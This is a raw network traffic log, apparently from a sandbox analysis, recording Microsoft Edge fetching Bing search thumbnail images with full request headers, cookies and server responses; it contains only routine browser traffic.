cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3465
date: Wed, 04 Dec 2024 10:08:55 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306935.7f1c99d
GET

https://www.bing.com/th?id=OSK.8JEs-_9SBUAPjLqFn45NoNbV1rqTVAJasIJxoVnDmzg&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.8JEs-_9SBUAPjLqFn45NoNbV1rqTVAJasIJxoVnDmzg&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2791
date: Wed, 04 Dec 2024 10:08:55 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306935.7f1c9ec
GET

https://www.bing.com/th?id=OSK.IoDK89DR0ggBFHTUt_fKGWWckTTUOST9im2yC05L_vE&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.IoDK89DR0ggBFHTUt_fKGWWckTTUOST9im2yC05L_vE&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3978
date: Wed, 04 Dec 2024 10:08:55 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306935.7f1c9f3
GET

https://www.bing.com/th?id=OSK.13XI46tVoIFX00fKdIBEvJi6lXDSynInKXy7GYU64tk&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.13XI46tVoIFX00fKdIBEvJi6lXDSynInKXy7GYU64tk&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2828
date: Wed, 04 Dec 2024 10:08:55 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306935.7f1c9f4
GET

https://www.bing.com/th?id=OSK.6HViEQck5PfB5ZNZtnLaye1sYG1erhA5vkKUiBapkFU&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.6HViEQck5PfB5ZNZtnLaye1sYG1erhA5vkKUiBapkFU&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3787
date: Wed, 04 Dec 2024 10:08:55 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306935.7f1c9f5
GET

https://www.bing.com/th?id=OSK.ZvozU4jjiCh_V9_lOHMBQBhRvbwvMLLc_s1-DUpcmcs&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.ZvozU4jjiCh_V9_lOHMBQBhRvbwvMLLc_s1-DUpcmcs&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 8027
date: Wed, 04 Dec 2024 10:08:55 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306935.7f1c9f6
GET

https://www.bing.com/th?id=OSK.Ckdj22N7IFhNPZ5EsY3v_khocb9UYJkt04rvnlYp7i0&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.Ckdj22N7IFhNPZ5EsY3v_khocb9UYJkt04rvnlYp7i0&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

content-length: 762
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a3808a64df8b3ce691d537250cc
x-as-setsessionmarket: en-gb
